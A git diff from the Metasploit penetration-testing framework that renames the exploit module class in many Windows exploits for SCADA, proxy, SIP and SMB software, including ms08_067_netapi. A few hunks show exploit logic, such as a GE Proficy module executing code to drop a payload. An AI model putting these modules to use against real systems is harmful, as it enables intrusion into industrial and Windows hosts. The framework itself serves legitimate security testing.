Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index 2cd1ccf651..2c04639fb6 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 9fd971c9e6..32cfb0c1b9 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index 623accfec0..13711e0958 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] } diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index bae54e50bb..1b8875b4e9 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 7dc8d3caef..2006bd8b07 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 25e75addc9..104269200b 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb index cdb7cdb0d7..467bb0092f 100644 --- a/modules/exploits/windows/scada/abb_wserver_exec.rb +++ b/modules/exploits/windows/scada/abb_wserver_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index 096e470c38..988432dd45 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb index 709c87917f..995fd79dd9 100644 --- a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb +++ b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb index 48a22d1afb..c9232eafd6 100644 --- a/modules/exploits/windows/scada/codesys_web_server.rb +++ b/modules/exploits/windows/scada/codesys_web_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Platform' => 'win', 'Payload' => diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index bf791cc5d9..dc3b814a0a 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/factorylink_csservice.rb b/modules/exploits/windows/scada/factorylink_csservice.rb index d9ccff31a2..9a8f17a1e5 100644 --- a/modules/exploits/windows/scada/factorylink_csservice.rb +++ b/modules/exploits/windows/scada/factorylink_csservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index 01c93d561f..06edd9cdc4 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index 5b423dfa65..2a81e8b6db 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report @@ -270,7 +270,7 @@ End Sub end def execute_bcl(i) - print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...") + print_status("Executing BCL code #{@basename}#{i}.bcl to drop final payload...") uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe") uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl" @@ -280,12 +280,12 @@ End Sub # We use res.to_s because the embedded CIMPLICITY Web server doesn't # answer with valid HTTP responses. if res and res.code == 200 and res.to_s =~ /(^Error.*$)/ - print_error("#{peer} - Server answered with error: $1") + print_error("Server answered with error: $1") fail_with(Failure::Unknown, "#{peer} - Server answered with error") elsif res and res.code == 200 and res.to_s =~ /No such file or directory/ fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file") elsif res and res.code == 200 - print_good("#{peer} - '200 OK' answer indicates success!") + print_good("'200 OK' answer indicates success!") else fail_with(Failure::Unknown, "#{peer} - Unknown error") end @@ -296,7 +296,7 @@ End Sub execute_bcl(i) end - print_status("#{peer} - Executing #{@exe_filename}...") + print_status("Executing #{@exe_filename}...") uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename) uri << "?" diff --git a/modules/exploits/windows/scada/iconics_genbroker.rb b/modules/exploits/windows/scada/iconics_genbroker.rb index 13b9ae70c8..9f51cfa0f8 100644 --- a/modules/exploits/windows/scada/iconics_genbroker.rb +++ b/modules/exploits/windows/scada/iconics_genbroker.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index 76d3ba0e37..9461c4b2e5 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb index 5e5d0fe856..c107f557ee 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb index aa2097f34f..8fd355274a 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index 41ba050c1b..0dfcda30ea 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/igss_exec_17.rb b/modules/exploits/windows/scada/igss_exec_17.rb index ebd1fce53c..6f63c03418 100644 --- a/modules/exploits/windows/scada/igss_exec_17.rb +++ b/modules/exploits/windows/scada/igss_exec_17.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index 2c4fa65f6b..99725bef2f 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb index 9ac1d96811..d416fd0189 100644 --- a/modules/exploits/windows/scada/moxa_mdmtool.rb +++ b/modules/exploits/windows/scada/moxa_mdmtool.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index 0c27241964..b999c2608e 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index bb08a5045c..0153ee50d5 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index 49bdb98f4c..dfcf1dc520 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_on_fcs_login.rb b/modules/exploits/windows/scada/realwin_on_fcs_login.rb index 3659a25bcb..2e3d2d7d07 100644 --- a/modules/exploits/windows/scada/realwin_on_fcs_login.rb +++ b/modules/exploits/windows/scada/realwin_on_fcs_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize.rb b/modules/exploits/windows/scada/realwin_scpc_initialize.rb index 6639e8f9d1..8a4bfd3ca0 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb index ae8957925b..2791b5a283 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb index 1ea64e355b..4899cb1144 100644 --- a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb +++ b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index 4a8e6d2e04..9da0341ab1 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb index 1360a3e0d3..4002ed40d9 100644 --- a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb +++ b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb index 9dc542a090..d7ddb592f7 100644 --- a/modules/exploits/windows/scada/winlog_runtime.rb +++ b/modules/exploits/windows/scada/winlog_runtime.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime_2.rb b/modules/exploits/windows/scada/winlog_runtime_2.rb index f77cd30561..9de15b89fe 100644 --- a/modules/exploits/windows/scada/winlog_runtime_2.rb +++ b/modules/exploits/windows/scada/winlog_runtime_2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb index 50988b7a1e..f382fc81ba 100644 --- a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb index 18c48e6ff9..b1bcc632af 100644 --- a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb index 5cef7ab51a..47e9e7e78f 100644 --- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb +++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb index 4766596f52..a31338f38e 100644 --- a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 12e2bf20af..3802f613ea 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index c26d264abb..20e47d950e 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index ae66736206..1c21d15813 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb index 760bcfd6d2..f52e48a799 100644 --- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb +++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/group_policy_startup.rb b/modules/exploits/windows/smb/group_policy_startup.rb index 8157d00f14..9be37de7e0 100644 --- a/modules/exploits/windows/smb/group_policy_startup.rb +++ b/modules/exploits/windows/smb/group_policy_startup.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb index 67eaa9baf9..953fa13ed8 100644 --- a/modules/exploits/windows/smb/ipass_pipe_exec.rb +++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 2b1c6f7272..985fd2cbd7 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 817f32c8d2..2a8565ddab 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index 8c9150e72f..e2c4864fda 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 63bb2284c4..30f78db495 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index c607558b2b..1e15f4dbe4 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index ad523283c1..e62d26a6c1 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index 73bf7bd392..540a4b7b6f 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 335165a58d..a5f6e127f5 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 17b58d9077..59ddf4c93b 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index e5104d14c2..c081217b06 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 059ff04131..5d3cd7763f 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Requires valid/working DOMAIN + DC include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb index 651de13296..c81a58727b 100644 --- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index a1e8de1191..f0523cc5aa 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC @@ -879,7 +879,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Windows 2003 SP0 is mostly universal - if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack' + if fprint['os'] == 'Windows 2003' and fprint['sp'].empty? mytarget = targets[3] end diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index 3cf78788c9..f8e71f3b7e 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index 7afff33985..db5fdcb58e 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index b1b688e620..69ce351e30 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -6,7 +6,7 @@ require 'msf/core' require 